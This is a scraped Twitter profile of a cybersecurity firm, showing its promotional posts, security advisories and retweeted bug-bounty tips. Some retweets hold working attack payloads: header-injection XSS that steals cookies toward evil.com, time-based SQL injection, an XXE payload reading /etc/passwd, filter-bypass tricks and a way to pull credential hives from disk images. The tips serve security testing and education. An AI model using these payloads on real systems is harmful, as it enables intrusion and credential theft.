NXTL Solutions (@nxtlsolutions)'s Twitter Profile

NXTLSolutions: Elevating your business with IT services, cybersecurity, AI, and digital solutions. Secure, innovate, and grow with cutting-edge tech. 🚀💡

ID: 1842669841003806720

Link: https://nxtlsolutions.com/
Date: 05-10-2024 20:55:18

21 Tweets

12 Followers

41 Following

AEMSecurity (@aemsecurity):

[+] Filter bypass techniques: Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;) #AEMSecurity #FilterBypass #bugbountytips #bugbountytip

AEMSecurity (@aemsecurity):

[+] Using Google dorks for unique subdomains? Try this: site:*-*-*.yourtarget.com site:*-*.*.yourtarget.com site:*.*.*.yourtarget.com #bugbountytips #bugbountytip #AEMSecurity

NXTL Solutions (@nxtlsolutions):

From detecting zero-day vulnerabilities to ensuring compliance with international standards, NXTL Solutions delivers the cybersecurity your business needs to thrive. Ready to protect your infrastructure? #ZeroDay #CyberProtection #NXTLSolutions

NXTL Solutions (@nxtlsolutions):

Nearly 72% of detections come from just two sectors. Do you know what they are? #CyberTraining #BusinessSecurity #nxtlsolutions #MaritimeSecurity #protectpatientdata #datasecurity

NXTL Solutions (@nxtlsolutions):

Our Red Team’s mission is to challenge and enhance cybersecurity defenses. Recently, we identified a method to bypass Cloudflare WAF’s XSS Protection using a unique payload, shedding light on potential security gaps in one of the most widely used web application firewalls.

nyxgeek (@nyxgeek):

Did you know that 7z can browse .VHD and .VMDK files? You can open them right up, and even directly browse ntfs filesystems. On a pentest and find a bunch of disk images? Copy the SAM/SECURITY/SYSTEM hives directly from the images, no mounting, copying, or fussing around.

NXTL Solutions (@nxtlsolutions):

Beware of fake browser update prompts! Cybercriminals are using #WarmCookie malware to trick users into downloading malicious software. Verify updates only through official channels. Stay safe! #NXTLSolutions #OnlineSafety #MalwareAlert #CyberSecurity

NXTL Solutions (@nxtlsolutions):

A 0-click pre-auth RCE (root) exploit was released on 27th October and is being actively exploited. If anyone is using LiteSpeed Cyberpanel that is publicly accessible right now, immediately upgrade it to the latest version 2.3.7 #NXTLSolutions #CyberSecurity #Cyberpanel

Coffin (@coffinxp7):

Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:

NXTL Solutions (@nxtlsolutions):

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity

NXTL Solutions (@nxtlsolutions):

#BugBountyTip #1: When hunting for #XSS in single-page apps (SPAs), don’t just look at the front end. Check the app’s JavaScript frameworks for unprotected DOM manipulations and unsafe sanitization practices. #BugBountyTips #NXTLSolutions

NXTL Solutions (@nxtlsolutions):

#BugBountyTip #2: Filter Evasion Test with different encoding schemes for bypassing filters, such as using HTML entities (`&#x3C;` for `<`), or testing with UTF-16 encodings. Encoding obfuscation can help when bypassing filters in certain contexts #BugBountyTips #NXTLSolutions

Trickest (@trick3st):

URLFinder has just landed in the Trickest Library 🚀 URLFinder brings high-speed, passive URL discovery tool to your custom automation workflows: 🔹 Passive source discovery 🔹 JSON/file/stdout output 🔹 Optimized speed & efficiency github.com/projectdiscove…

Dark Web Intelligence (@dailydarkweb):

🔓 1.6 Million WordPress Logins - Data Leak Exposed A leak of 1.6 million WordPress login credentials, including usernames and passwords, has surfaced on the dark web. The compromised data increases the risk of unauthorized access to websites, identity theft, and potential

AEMSecurity (@aemsecurity):

[+] #BugbountyTip Take your time, Do Not Rush! Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips

AEMSecurity (@aemsecurity):

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity
